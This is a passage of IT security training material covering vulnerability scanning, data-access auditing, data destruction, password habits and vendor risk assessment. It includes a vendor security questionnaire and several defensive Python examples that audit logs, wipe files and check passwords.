to detecting the presence of backdoors in systems. 
It's important to call out that 
vulnerability scanning can only detect known 
and disclosed vulnerabilities 
and insecure configurations. 
That's why it's important for you to have 
an automated vulnerability scan conducted regularly. 
You'll also need to keep the vulnerability database 
up-to-date to make sure 
new vulnerabilities are detected quickly. 
But vulnerability scanning isn't 
the only way to put your defenses to the test. 
Conducting regular penetration tests is 
also really encouraged to test your defenses even more. 
These tests will also ensure 
detection and alerting systems are working properly. 
Penetration testing is the practice 
of attempting to break 
into a system or network to verify the systems in place. 
Think of this as playing the role of 
a bad guy for educational purposes. 
This exercise isn't designed 
to see if you have the acting chops. 
It's intended to make you think like an attacker 
and use the same tools and techniques they would use. 
This way you can test your systems to 
make sure they protect you like they're supposed to. 
The results of the penetration testing reports will 
also show you where weak points or blind spots exist. 
These tests help improve 
defenses and guide future security projects. 
They can be conducted by members 
of your in-house security team. 
If your internal team doesn't 
have the resources for this exercise, 
you can hire a third-party company that 
offers penetration testing as a service. 
You can even do both. 
That would help give you more perspectives on 
your defense systems and you'll get 
a more comprehensive test this way.

Supplemental Reading for Risk in the Workplace
For more detailed information on this video lecture, check out the following tools:
Nessus, OpenVAS, and Qualys.

PRIVACY POLICIES

When you're supporting systems that handle customer data, 
it's super-important to protect it 
from unauthorized and inappropriate access. 
It's not just to defend against external threats. 
It also protects the data against misuse by employees. 
This type of behavior would fall under 
your company's privacy policies. 
Privacy policies oversee the access 
and use of sensitive data. 
They also define what appropriate 
and authorized use is and 
what provisions or restrictions are in 
place when it comes to how the data is used. 
Keep in mind that people might not consider 
the security implications of their actions. 
Both privacy and data access policies 
are important to guiding 
and informing people how to maintain 
security while handling sensitive data. 
Having defined and well-established privacy policies 
is an important part of good privacy practices. 
But you also need a way to enforce these policies. 
Periodic audits on cases where 
sensitive data was accessed can get you there. 
This is enabled by our logging and monitoring systems. 
Auditing data access logs is super important. 
It helps us ensure that 
sensitive data is only accessed by 
people who are authorized to access 
it and that they use it for the right reasons. 
It's good practice to apply 
the principle of least privilege here. 
By not allowing access to this type of data by default, 
you should require anyone that needs access to first make 
an access request with 
a justification for getting the data. 
But it can't be a vague or generic request for access. 
They should be required to 
specify what data they need access to. 
Usually, this type of request would also 
have a time limit that should be 
called out in the request. 
That way, you can ensure that data access is 
only permitted for legitimate business reasons, 
which reduces the likelihood of 
inappropriate data access or usage. 
By logging each data access request 
and each actual data access, 
we can also correlate requests with usage. 
Any access that doesn't have 
a corresponding request should be flagged as 
a high priority potential breach 
that needs to be investigated as soon as possible. 
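The request-versus-usage correlation described above, as an added example that is not part of the course material. The approved requests, the log lines and the field names are constructed for illustration and are not any product's real schema; the check distinguishes "never requested" from "requested, but read outside the approved window", and ranks the unexplained reads by size.

```python
"""Correlate sensitive-data accesses with approved access requests.

Added example with constructed data: the approved requests, the log lines and the
field names are assumptions for illustration, not any product's real schema.
"""
from datetime import datetime

# Constructed approved requests: who may read which dataset, why, and for how long.
APPROVED_REQUESTS = [
    {"user": "alice", "dataset": "customer_pii", "justification": "support ticket 4412",
     "not_before": datetime(2024, 3, 1, 9, 0), "not_after": datetime(2024, 3, 1, 17, 0)},
    {"user": "bob", "dataset": "billing", "justification": "monthly reconciliation",
     "not_before": datetime(2024, 3, 1, 0, 0), "not_after": datetime(2024, 3, 2, 0, 0)},
]

# Constructed access log: one line per read of a sensitive dataset.
ACCESS_LOG = """\
2024-03-01T10:15:00 user=alice dataset=customer_pii records=3
2024-03-01T18:30:00 user=alice dataset=customer_pii records=250
2024-03-01T11:00:00 user=bob dataset=billing records=1200
2024-03-01T11:05:00 user=carol dataset=customer_pii records=1
2024-03-01T11:06:00 user=bob dataset=customer_pii records=40
"""


def parse_log_line(line):
    """'<iso-time> k=v k=v ...' -> dict with a datetime and a typed record count."""
    timestamp, *fields = line.split()
    event = {"time": datetime.fromisoformat(timestamp)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    event["records"] = int(event["records"])
    return event


def find_request(event, requests):
    """The approved request covering this access (user, dataset, time window), or None."""
    for req in requests:
        if (req["user"] == event["user"] and req["dataset"] == event["dataset"]
                and req["not_before"] <= event["time"] <= req["not_after"]):
            return req
    return None


def audit(log_text, requests=APPROVED_REQUESTS):
    """Every access with no matching approved request, largest reads first."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_log_line(line)
        if find_request(event, requests) is not None:
            continue  # approved and in window: nothing to flag
        # Distinguish "never asked" from "asked, but read outside the approved window".
        asked = any(r["user"] == event["user"] and r["dataset"] == event["dataset"]
                    for r in requests)
        event["reason"] = "outside approved window" if asked else "no approved request"
        event["priority"] = "high"  # potential breach: investigate as soon as possible
        alerts.append(event)
    return sorted(alerts, key=lambda e: e["records"], reverse=True)


if __name__ == "__main__":
    for alert in audit(ACCESS_LOG):
        print(alert["time"], alert["user"], alert["dataset"],
              alert["records"], "records:", alert["reason"])
```

Run against the constructed log, this flags alice's 250-record read after her window closed, bob's read of a dataset he never requested, and carol's read with no request at all, while the two in-window approved reads pass.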
Company policies act as our guidelines and 
informational resources on how 
and how not to access and handle data. 
They're equally important here. 
Policies will range from 
sensitive data handling to public communications. 
Data handling policies should cover 
the details of how different data is classified. 
What makes some data sensitive 
as opposed to non-sensitive? 
What's considered confidential data? 
Well, once different data classes are defined, 
you should create guidelines around 
how to handle these different types of data. 
If something is considered sensitive or confidential, 
you'd probably have stipulations that this data 
shouldn't be stored on media 
that's easily lost or stolen, 
like USB sticks or portable hard drives. 
These are also commonly used 
without any encryption at all. 
Imagine if one of your employees lost 
an unencrypted portable hard drive full 
of customer information, disaster. 
That's exactly the situation 
a data access policy tries to avoid. 
It might also make sense to include 
laptops and mobile devices, 
like phones and tablets in 
the removable media classification. 
Since these devices are easily lost or stolen, 
even though they're more commonly encrypted these days, 
the loss and theft rate is much higher. 
You may not like users storing 
sensitive data on removable media, 
but sometimes you're out of luck. 
There may be an occasion where that's 
the only solution to accomplish a task. 
If this is the case, 
it would help to have recommendations on how to 
handle the situation in a secure way. 
You could offer an appropriate encryption solution 
and provide instructions and support on its use.

Data Destruction
Data destruction is removing or destroying data stored on electronic devices so that an
operating system or application cannot read it. Data destruction is required when a company
no longer needs a device, when there are unused or multiple copies of data, or when you are
required to destroy specific data.

There are three categories of data destruction methods: recycling, physical destruction, and
third-party destruction. This reading will introduce the data destruction methods and how to
decide which method to use.

Recycling

Recycling includes methods that allow for device reuse after data destruction. This option is
recommended if you hope to reuse devices internally, sell surplus equipment, or your devices
are on loan and are due to be returned. Standard recycling methods include the following:

• Erasing/wiping: cleans all data off a device's hard drive by overwriting it. Erasing or
wiping data can be done manually or with data-destruction software. This method is
practical when you only have a few devices that need data destroyed, as it takes a long
time. Note that it may take multiple passes to wipe highly sensitive data completely.
• Low-level formatting: erases all data written on the hard drive by overwriting it with
zeros. Low-level reformatting can be done using a tool such as HDDGURU on a PC or
the Disk Utility function on a Mac. Note that overwriting is unreliable on SSDs and other
flash storage, where wear levelling can leave copies of the data in blocks the overwrite
never reaches; use the drive's built-in secure-erase or sanitize command for those instead.
• Standard formatting: erases the path to the data and not the data itself. Both PCs and
Macs have internal tools that can perform a standard format, Disk Management on a
PC or Disk Utility on a Mac. Note that standard formatting does not remove the data
from the device, enabling data recovery using software.
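The overwrite-and-verify step behind the "erasing/wiping" method, as an added example that is not part of the reading. `make_scratch_file` exists only to give the example something safe to wipe; the pass count is an illustrative choice. The caveat in the docstring matters more than the code: this confirms the file's logical contents are gone, and says nothing about physical copies left by copy-on-write filesystems, snapshots or SSD wear levelling, which is why whole-device erasure should use the drive's own secure-erase or sanitize command (NIST SP 800-88 covers the choices).

```python
"""Overwrite-then-verify erasure of a single file (the "erasing/wiping" method).

Added example, not part of the reading. make_scratch_file is a test fixture that
creates constructed sample data to wipe.
"""
import os
import tempfile

CHUNK = 1 << 20  # overwrite in 1 MiB pieces so large files are never fully loaded


def _overwrite_pass(fd, size, fill):
    """One full pass over the file; fill(n) supplies the n bytes for each chunk."""
    os.lseek(fd, 0, os.SEEK_SET)
    remaining = size
    while remaining > 0:
        n = min(CHUNK, remaining)
        os.write(fd, fill(n))
        remaining -= n
    os.fsync(fd)  # push this pass to the device before the next one starts


def _all_zero(fd, size):
    """Read the file back and confirm the filesystem now returns only zeros."""
    os.lseek(fd, 0, os.SEEK_SET)
    remaining = size
    while remaining > 0:
        chunk = os.read(fd, min(CHUNK, remaining))
        if not chunk or chunk.count(0) != len(chunk):
            return False
        remaining -= len(chunk)
    return True


def wipe_file(path, random_passes=2):
    """Overwrite `path` with random data `random_passes` times, then with zeros,
    verify the zero pass, and delete the file. Returns a small report dict.

    Caveat: this verifies the file's *logical* contents. Copy-on-write and
    journaling filesystems, snapshots, and SSD wear levelling can keep physical
    copies of the old blocks, so whole-device erasure should use the drive's own
    secure-erase/sanitize command or physical destruction instead.
    """
    size = os.path.getsize(path)
    fd = os.open(path, os.O_RDWR)
    try:
        for _ in range(random_passes):
            _overwrite_pass(fd, size, os.urandom)
        _overwrite_pass(fd, size, lambda n: bytes(n))  # bytes(n) is n zero bytes
        verified = _all_zero(fd, size)
    finally:
        os.close(fd)
    if verified:  # never delete a file whose overwrite could not be confirmed
        os.remove(path)
    return {"bytes": size, "passes": random_passes + 1,
            "verified": verified, "removed": not os.path.exists(path)}


def make_scratch_file(content):
    """Create a temporary file holding `content` (test fixture; constructed data)."""
    fd, path = tempfile.mkstemp(prefix="wipe-demo-")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path


if __name__ == "__main__":
    scratch = make_scratch_file(b"customer record: example only\n" * 4096)
    print(wipe_file(scratch))
```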

Physical destruction

Physical destruction includes any method that physically destroys a device to make it difficult
to retrieve data from it. You should only use physical destruction if you do not need to reuse
the device. However, only completely destroying the device ensures the destruction of all
data with physical methods. Physical destruction methods include the following:

• Drilling holes directly into the device destroys the data only in the sections where there are
holes. Individuals can still recover data from the areas that remain intact.
• Shredding includes the physical shredding of hard drives, memory cards, CDs, DVDs,
and other electronic storage devices. Shredding reduces the potential for recovery.
Shredding requires special equipment or outsourcing to another facility.
• Degaussing uses a high-powered magnet which destroys the data on magnetic media such
as hard drives and tapes and renders the hard drive unusable. It has no effect on flash-based
storage such as SSDs, USB sticks, and memory cards, so as electronic technology changes,
this method applies to fewer and fewer devices.
• Incinerating destroys data by burning the device. Most companies do not have an
incinerator on-site. Devices need to be transported to a facility for incineration. Due to
this, devices can be lost or stolen in transit.
In addition to effectively destroying data on electronic devices, it is essential to follow best
practices for electronic device disposal. 

Outsourcing

Outsourcing means using a third-party specializing in data destruction to complete the
physical or recycling process. This option appeals to companies that do not have the staff or
knowledge to complete the destruction themselves. Once a vendor has completed the task,
they issue a certificate of destruction/recycling.

The certificate of destruction serves as a statement of completed destruction of data on
electronics, hard drives, or other devices. The certificate includes the client’s contact
information, date of service, vendor company name, manifest, signature, method of
destruction, and legal statement. However, exercise caution as the certificate does not
indicate a level of training, auditing, or any other verification that a vendor is knowledgeable
about data destruction.

Key Takeaways

Data destruction makes data unreadable to an operating system or application. You should
destroy data on devices no longer used by a company, unused or duplicated copies of data,
or data that you are required to destroy. Data destruction methods include:

• Recycling: erasing the data from a device for reuse
• Physical destruction: destroying the device itself to prevent access to data
• Outsourcing: using an external company specializing in data destruction to handle
the process
Resource for further information
For more information about disposing of electronics, please visit Proper Disposal of
Electronic Devices, a resource from CISA.

USER HABITS

You've got to involve your users 
when it comes to security. 
It's super important and might seem obvious, 
but it's usually overlooked. 
You can build the world's best security systems, 
but they won't protect you if the users are 
going to be practicing unsafe security. 
If a user writes their password on a Post-it Note, 
sticks it to their laptop, 
then leaves the laptop unlocked and unattended at a cafe, 
you could have a disaster on your hands. 
But making sure that your users 
take reasonable security precautions 
takes effort, and can be really tricky. 
Guiding your users' habits and actions 
starts with having clear and reasonable security policies, 
but there's more that you can do to help ensure that 
your users are diligent about maintaining security. 
Let's assume that your employees are acting 
with good intent and that leaks and 
disclosures are unintentional and mostly 
due to improper handling of sensitive data. 
Leaks and disclosures can be avoided by 
understanding what employees need 
to do to accomplish their jobs. 
You also need to make sure that they have 
the right tools to get their work 
done without compromising security. 
If an employee needs to share a confidential file with 
an external partner and it's too big to email, 
they may want to upload it to 
a third-party file-sharing website 
that they have a personal account with. 
This is risky business. 
You should never upload confidential information onto 
a third-party service that 
hasn't been evaluated by your company. 
If sharing big files with 
external parties is common behavior for your employees, 
it's best to find a solution that meets the needs 
of your users and the security guidelines. 
By providing a sanctioned and approved 
mechanism for this file sharing activity, 
users are less likely to expose 
the organization to unnecessary risk. 
We covered password security when we 
discussed password authentication earlier, 
but there's more to talk about when it 
comes to users and passwords. 
I hate to say it, but generally speaking, 
users can be lazy about security stuff. 
They don't like to memorize long complicated passwords, 
but this is super important to keeping your company safe. 
How do we resolve this conflict? 
If we require 20-character passwords 
that have to be changed every three months, 
our users will almost definitely write them down. 
This compromises the security that 
our complex password policy is supposed to provide. 
It's important to understand what 
threats password policies are 
supposed to protect against. 
That way, you can try to find 
a better balance between security and usability. 
A long and complex password requirement 
is designed to protect against brute force attacks, 
either against authentication systems or 
if a hashed password database is stolen. 
Since direct brute-force attacks 
against authentication infrastructure 
should be easily detected and 
blocked by intrusion prevention systems, 
they can be considered pretty low-risk, 
but the theft of 
a password database would be a super serious breach. 
We do have lots of additional layers 
of security in place to 
prevent a critical compromise 
like that from happening in the first place. 
With those layers in place, the two attacks 
that complex passwords are primarily designed 
to protect against are fairly low-risk. 
Now, we can relax the password requirements 
a bit and not ask for overly long passwords. 
We can even adjust 
the mandatory password rotation time period. 
Password reuse is another common user behavior. 
People don't want a bunch of passwords to memorize. 
Lots of users find it easier to use 
the same password for 
both their personal email 
account and their work account, 
but this undermines the security of their work password. 
If an online service is compromised and 
the password database is leaked, they're in trouble. 
The passwords in that database will find their way into 
password files used for 
cracking passwords and brute force attacks. 
Once a password isn't a secret, 
it shouldn't be used anymore. 
The chances of a bad actor 
being able to use the password are too high. 
That's why it's important to make sure employees use 
new and unique passwords 
and don't reuse them from other services. 
It's also important to have 
a password change system check against old passwords. 
This will prevent users from 
changing their password back to 
a previously used potentially compromised password. 
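The two checks the passage calls for, a password-change system that refuses previously used passwords and refuses passwords already known from leaked databases, as one added example that is not code from the course. `KNOWN_LEAKED_SHA1` is a constructed stand-in for a real leaked-password corpus (it is keyed by SHA-1 only because that is the lookup format the widely used Pwned Passwords corpus publishes; SHA-1 is never used to store the user's own password), and the PBKDF2 parameters are illustrative assumptions rather than a recommendation.

```python
"""Password-change checks: reject passwords from a known leak and reuse of recent ones.

Added example, not code from the course. KNOWN_LEAKED_SHA1 is a constructed stand-in
for a real leaked-password corpus; the PBKDF2 parameters are illustrative assumptions.
"""
import hashlib
import hmac
import os

# Constructed stand-in for a leaked-password list, stored as SHA-1 hex so no
# plaintext list sits on disk. SHA-1 is only a lookup key here, never password storage.
KNOWN_LEAKED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest() for p in ("password", "monkey", "football")
}

HISTORY_DEPTH = 5          # previous passwords a user may not return to
PBKDF2_ROUNDS = 100_000    # slow hash so a stolen history file is expensive to crack


def hash_password(password, salt=None):
    """(salt, digest) via PBKDF2-HMAC-SHA256, with a fresh random salt per entry."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def matches(password, entry):
    """Constant-time comparison against a stored (salt, digest) entry."""
    salt, digest = entry
    return hmac.compare_digest(hash_password(password, salt)[1], digest)


def is_known_leaked(password):
    return hashlib.sha1(password.encode()).hexdigest() in KNOWN_LEAKED_SHA1


class PasswordStore:
    """Per-user current password hash plus a bounded history of former ones."""

    def __init__(self):
        self._current = {}   # user -> (salt, digest)
        self._history = {}   # user -> [(salt, digest), ...], newest first

    def change_password(self, user, new_password):
        """Apply a change; return None on success or the reason it was rejected."""
        if is_known_leaked(new_password):
            return "password appears in a known breach; choose another"
        recent = (([self._current[user]] if user in self._current else [])
                  + self._history.get(user, []))
        if any(matches(new_password, entry) for entry in recent):
            return "password was used recently; choose one you have not used before"
        if user in self._current:
            # Retire the old hash into history, keeping only the last HISTORY_DEPTH.
            self._history[user] = ([self._current[user]]
                                   + self._history.get(user, []))[:HISTORY_DEPTH]
        self._current[user] = hash_password(new_password)
        return None

    def verify(self, user, password):
        return user in self._current and matches(password, self._current[user])


if __name__ == "__main__":
    store = PasswordStore()
    print(store.change_password("dana", "football"))               # rejected: leaked
    print(store.change_password("dana", "correct horse battery"))  # None: accepted
    print(store.change_password("dana", "correct horse battery"))  # rejected: reuse
```

The history holds only salted slow hashes, so a reuse check costs one PBKDF2 computation per stored entry and a stolen history file gives an attacker nothing cheaper than a stolen password database would.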
A much greater risk in the workplace that users should be 
educated on is credential theft from phishing emails. 
Phishing emails are pretty effective. 
They take advantage of people's inclination to 
open emails without looking at them too closely. 
If an email that seems authentic 
actually leads to a fake login page, 
users can blindly enter their credentials into 
the fake site and 
disclose their credentials to an attacker. 
While having two-factor authentication 
helps protect against this type of attack, 
OTP based two-factor solutions 
would still provide usable credentials to an attacker, 
plus the attacker still has a password, 
which is really not 
good even in a two-factor environment. 
If someone enters their password into 
a phishing site or even suspects they did, 
it's important to change 
their password as soon as possible. 
If you can, your organization should try to detect 
these types of password disclosures 
using tools like Password Alert. 
This is a Chrome extension from 
Google that can detect when you 
enter your password into a site that's not a Google page. 
Being able to detect when a password is entered into 
a potentially untrustworthy site lets 
an organization detect potential phishing compromises, 
but you can also combat phishing attacks with 
good spam filtering combined with good user education. 
You can help influence 
good user behavior by offering security training.

Supplemental Reading for User Habits


To help prevent password phishing, check out tools like Password Alert.

THIRD PARTY SECURITY

Sometimes you need to rely on third party solutions or 
service providers because you might not be able to do everything in house. 
This is especially true if you work as an IT support specialist in a small shop. 
In some cases, you have to trust that third party with a lot of 
potentially sensitive data or access. 
So how do you make sure that you aren't opening yourself up to a ton of 
unnecessary risk? 
When you contract services from a third party, 
you're trusting them to protect your data and any credentials involved. 
If they have subpar security, you're undermining your security defenses by 
potentially opening a new avenue of attack. 
It's important to hire trustworthy and reputable vendors whenever you can. 
You also need to manage the engagements in a controlled way. 
This involves conducting a vendor risk review or security assessment. 
In typical vendor security assessments, you ask vendors to complete 
a questionnaire that covers different aspects of their security policies, 
procedures and defenses. 
The questionnaire is designed to determine whether or 
not they've implemented good security designs in their organization. 
For software services or hardware vendors, 
you might also ask to test the software or hardware. 
That way you can evaluate it for potential security vulnerabilities or 
concerns before deciding to contract their services. 
It's important to understand how well protected your business partners 
are before deciding to work with them. 
If they have poor security practices, your organization's security could be at risk. 
If you contract services from a company that will be handling data on your behalf, 
the security of your data is in the hands of this third party. 
It's important to understand how safe your data will be with them. 
Sometimes, vendors will perform tasks for you, so 
they have access to your network and systems. 
In these cases, it's also important to understand how well secured the third party 
is, since a compromise of their infrastructure could lead to a breach of your systems. 
While the questionnaire model is a quick way to assess a third party, 
it's not ideal. 
It depends on self reporting of practices which is pretty unreliable, 
without a way to verify or prove what's stated in the questionnaire. 
You have to trust that the company is answering honestly. While you'd hope that 
a company you're doing business with would be honest, it's best to verify. 
If you can, ask for a third-party security assessment report. 
Some of the information on the questionnaire can be verified like third 
party security audit results and penetration testing reports. 
In the case of third party software, 
you might be able to conduct some basic vulnerability assessments and 
tests to ensure the product has some reasonable security. 
There are lots of companies that will evaluate vendors for you for a price, but 
Google recently made their vendor security assessment questionnaires available 
for free. 
This is a great starting point to design your own vendor security assessment 
questionnaire, or you can just use these as is. 
If the third party service involves the installation of any infrastructure 
equipment on site, pay close attention to how they're doing it. 
You have to make sure this equipment is managed in a way that doesn't 
negatively affect overall security. 
Let's say the vendor company requires remote access to the infrastructure device 
to perform maintenance. 
If that's the case, 
then make appropriate adjustments to firewall rules to restrict this access. 
That way, 
you'll make sure that it can't be used as an entry point into your network. 
Additional monitoring would also be recommended for this third party device, 
since it represents a new potential attack surface in your network. 
If the vendor lets you, evaluate the hardware in a lab environment first. 
There you can run in-depth vulnerability assessments and 
penetration testing of the hardware 
and make sure there aren't any obvious vulnerabilities in the product. 
Report your findings to the vendor and ask that they address any issues you discover.
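The "restrict the access, then monitor it" advice above, as an added example (not code from the course or from any vendor): a check that reads accepted-connection records from a firewall log and flags every connection to a vendor-managed appliance that does not match the agreed access policy, plus any connection the appliance itself opens to other internal hosts. The appliance address, the vendor's source range, the SSH-only rule, the 02:00 to 04:00 maintenance window and the log line format are all assumptions for this example, and the sample log lines are constructed.

```python
from __future__ import annotations

import ipaddress
import re
from datetime import datetime, time

# --- Access policy for one vendor-managed appliance (all values are assumptions) ---
VENDOR_DEVICE = ipaddress.ip_address("10.20.30.40")          # the on-site appliance
VENDOR_JUMP_HOSTS = [ipaddress.ip_network("203.0.113.0/24")]  # vendor's stated source range
ALLOWED_PORTS = {22}                                          # SSH only, no RDP or web console
MAINTENANCE_WINDOW = (time(2, 0), time(4, 0))                 # agreed window, local time

# Constructed firewall log format: "<iso-timestamp> ACCEPT <src>:<sport> -> <dst>:<dport>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) ACCEPT (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def audit_vendor_access(lines: list[str]) -> list[tuple[str, str]]:
    """Return (log line, reason) for every accepted connection that violates the policy."""
    findings: list[tuple[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line or a record type this check does not cover
        src = ipaddress.ip_address(m["src"])
        dst = ipaddress.ip_address(m["dst"])
        dport = int(m["dport"])
        ts = datetime.fromisoformat(m["ts"])

        if src == VENDOR_DEVICE and dst.is_private:
            # The appliance should only ever be the target of maintenance sessions,
            # never a client of other internal hosts: that is what a pivot looks like.
            findings.append((line, f"vendor device initiated connection to internal host {dst}:{dport}"))
            continue
        if dst != VENDOR_DEVICE:
            continue  # traffic to other hosts is out of scope for this check

        reasons = []
        if not any(src in net for net in VENDOR_JUMP_HOSTS):
            reasons.append(f"source {src} not in vendor allowlist")
        if dport not in ALLOWED_PORTS:
            reasons.append(f"port {dport} not permitted for vendor access")
        if not (MAINTENANCE_WINDOW[0] <= ts.time() < MAINTENANCE_WINDOW[1]):
            reasons.append("outside agreed maintenance window")
        if reasons:
            findings.append((line, "; ".join(reasons)))
    return findings


# Constructed sample log using documentation (TEST-NET) addresses, not real traffic.
SAMPLE_LOG = """\
2024-05-01T02:15:00 ACCEPT 203.0.113.10:51514 -> 10.20.30.40:22
2024-05-01T13:02:11 ACCEPT 203.0.113.10:51600 -> 10.20.30.40:22
2024-05-01T02:20:05 ACCEPT 198.51.100.7:40000 -> 10.20.30.40:22
2024-05-01T02:21:00 ACCEPT 203.0.113.10:51700 -> 10.20.30.40:3389
2024-05-01T02:30:00 ACCEPT 10.20.30.40:44000 -> 10.20.30.5:445
2024-05-01T09:00:00 ACCEPT 10.0.0.8:55000 -> 10.0.0.9:443
""".splitlines()

if __name__ == "__main__":
    for line, reason in audit_vendor_access(SAMPLE_LOG):
        print(f"ALERT: {reason}\n    {line}")
```

Ideally the firewall rule set already drops everything this script would flag; the check still earns its place because it catches rule changes made in a hurry, a vendor that quietly moves to a new source range, and the outbound-from-appliance case, which a rule written only to restrict inbound maintenance access will not cover.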

Supplemental Reading for Vendor Security Assessment Questionnaires

Google recently made their Vendor Security Assessment Questionnaires available for
free. You can check them out here.

Infrastructure Security Questionnaire

Questionnaire Options

Select the options that describe your project. These settings configure the questionnaire to fit
different scenarios.

[ ] Sensitive data: This project involves processing Personally Identifiable Information (PII), Sensitive
PII, or other information your customers may consider sensitive.

[ ] Remote access only: All information processing occurs on your customers' systems, and this project
accesses those systems remotely.

Network

Why this section matters: Your network is the foundation of your IT infrastructure and the first line of
defense against external attackers. If the devices that make up your network are not adequately
maintained and secured, an attacker might gain access to confidential information.

It's essential to have a written set of guidelines for the configuration, maintenance, and use of your
network. Written guidelines and rules help preserve the availability, integrity, and confidentiality of
the network itself, as well as the information transmitted over it.

[ ] We have clearly defined network guidelines. They are regularly reviewed and applied to all
appropriate networking devices.

[ ] We don't currently have guidelines, or they're not consistently applied.

Firewalls are a basic network security control. Does your company use firewalls to restrict traffic into
and out of your network at strategic points?

[ ] Yes, we have firewalls for filtering all inbound and outbound traffic.

[ ] We do not use firewalls.

Is encryption and integrity protection in place for all internal network traffic that potentially carries
sensitive information (including passwords, emails, files, source code, management traffic, etc.)?

[ ] Yes

[ ] Some unencrypted protocols may carry sensitive information.

Have you implemented monitoring and alerting for your network?

[ ] Yes

[ ] No

Do you operate wireless networks that allow access to private aspects of your infrastructure (i.e., Wi-Fi
networks, excluding networks that only allow guests access to the Internet)?

[ ] Yes.

[ ] No, we only have Wi-Fi networks that allow guests to access the Internet; they don't have access to
any private aspects of our infrastructure.

Do you operate a VPN that allows remote access to your network?

[ ] Yes

[ ] No

Is the management of your network (or parts thereof) outsourced?

[ ] Yes

[ ] No

Do you have any other comments about the security of your network? If yes, please provide them
below:

Servers

Why this section is relevant: Servers are an important piece of the overall attack surface of any IT
infrastructure. Even seemingly less-sensitive systems should be carefully evaluated, because a single
poorly configured system can help an attacker get a foot in the door. From there, they might gain
access to more sensitive systems nearby (other servers, clients, etc.).

Do you have operating system hardening in place, or build standards for server systems?

[ ] Yes, all of our servers are configured according to these standards.

[ ] We do not have these standards, or we don't apply them uniformly across the fleet.

Do you have a process for installing operating system and application updates and security patches on
servers?

[ ] Yes, we are very diligent about applying security updates to operating systems and applications.

[ ] No, we don't have a process for patching. Some updates might fall through the cracks.

Are your systems configured to log security-relevant events, such as authentication, data access, etc.?

[ ] Yes, we have comprehensive logging, including security events, for all relevant services.

[ ] No, our logging is basic or incidental.

Administrative Access

Select the operating systems that are currently in use on your servers:

[ ] Microsoft Windows

[ ] Unix (including Linux, Solaris, etc.)

Backups

Do you store backups on disks, tapes, or other kinds of removable media?

[ ] Yes.

[ ] No.

Do you have procedures in place for working with customers to determine an appropriate backup
frequency?

[ ] Yes, we talk to our customers to gather requirements for backup frequency, and we implement
backup intervals accordingly.

[ ] No, we have a fixed backup cycle.

Do you regularly test your backups?

[ ] Yes, we test the entire process of recovery, including restoring entire systems from backup.

[ ] We don't usually test backups.

Is the management of your servers (or parts thereof) outsourced?

[ ] Yes

[ ] No

Is there anything else you want us to know about the security of your servers?

Clients (Workstations, Laptops, etc.)

Why this section matters: In most companies, almost all IT-related work is performed from client
computers. Even if certain data is stored in the cloud or on highly secure servers, it's the laptops and
desktops that are used to access this information. An attacker who manages to compromise a client
computer will in most cases be able to completely impersonate the user of the machine, gaining the
same access rights. If an administrator's client machine is affected by an attack, the attacker will likely
be able to escalate their foothold to many other important systems in your company. It's therefore
critical to ensure the security of the client machines used by your employees.

Do you have operating system hardening and/or build standards for client systems?

[ ] Yes, all of our client systems are configured according to these standards, and/or they are built from
standard images that comply with our hardening guidelines.

[ ] We do not have hardening or build standards, or we don't apply them uniformly across the fleet.

Do you have a process for installing operating system and application updates and security patches on
client systems?

[ ] Yes, we diligently apply security updates to operating systems and applications.

[ ] No, we don't have a process for patching. Some updates might fall through the cracks.

Do you have controls in place to protect client systems from malware?

[ ] Yes, we regularly scan our client systems for known malware, or we limit client systems to
whitelisted software identified by cryptographic hashes.

[ ] Some systems in our client fleet may not be fully protected.

Are your client systems configured to log security-relevant events, such as authentication, data access,
etc.?

[ ] Yes, we have comprehensive logging enabled on client systems, including security events.

[ ] No, our logging is basic or incidental.

What level of access do regular users have on their workstation/laptop?

[ ] Regular users have (unprivileged) user access on their machines. We have a process in place for
granting local administrative access to users who demonstrate a clear need.

[ ] Users are local administrators on their machines.

Do all clients use the same local administrator/root password?

[ ] Yes, the local root or administrator password is the same for all (or many) client systems.

[ ] No, local Administrator/root accounts are disabled, or a different password is set for all machines.

One major risk factor in many corporate environments is the use of older versions of Windows. Does
your company still have systems running Windows Vista or earlier versions?

[ ] Yes, some or all of our client machines still run Windows Vista or earlier versions.

[ ] No, our client machines do not run Windows Vista or earlier versions. Legacy installations have
been completely separated from our main infrastructure and cannot access any of your information.

Encryption

Do you fully encrypt the hard disks of laptops and other portable client devices?

[ ] Yes, we use full-disk encryption for our laptop fleet.

[ ] No, laptop hard disks are not fully encrypted. Users are responsible for protecting sensitive
information on laptops.

Do you allow access to confidential information (e.g., email) from unencrypted mobile devices such as
phones and tablets?

[ ] Yes, our users can sync potentially confidential information like email onto their mobile phones or
tablets.

[ ] No, we do not allow access to corporate information from unencrypted devices such as mobile
phones or tablets.

Is there anything else you want us to know about the security of your client systems?

Technical Security Testing

Why this section matters: In addition to audits of your information security program, you should
perform technical security testing of information systems to make sure they function as intended, and
that the data is properly protected. Some security issues, particularly in proprietary software, can only
be identified manually; therefore both manual and automated testing should be performed. Even if
the project exclusively uses standard off-the-shelf software, technical security testing helps ensure that
software and infrastructure are configured securely and free of known security issues.

Does an independent third party regularly perform penetration tests on all systems used to provide
services to customers?

[ ] Yes.

[ ] No, we rarely or never have independent third parties do penetration tests.

Are all of the systems used in this project scanned for host-level vulnerabilities? (Note: This question
does not refer to anti-malware scans. Instead, it refers to scans that look for known vulnerabilities
and misconfiguration of the software running on servers.)

[ ] Yes

[ ] No

In addition to third-party penetration tests and security scans, do you have security know-how
internally, and do you use that know-how to conduct in-house security testing?

[ ] Yes, our security team does technical security reviews of the systems used for this project.

[ ] No, we don't do in-house security testing.

Is there anything else you want us to know about the security testing of your infrastructure and/or
product?

Security Contact

Please provide the email addresses (separated by semicolons) of team members who should be
contacted about any security issues:

SECURITY TRAINING

The more trained up you and your colleagues are on security, the better. 
It's impossible to have good security practices at your company if employees and 
users haven't received good training and resources. 
This will boost a healthy company culture and overall attitude towards security. 
A working environment that encourages people to speak up when they feel 
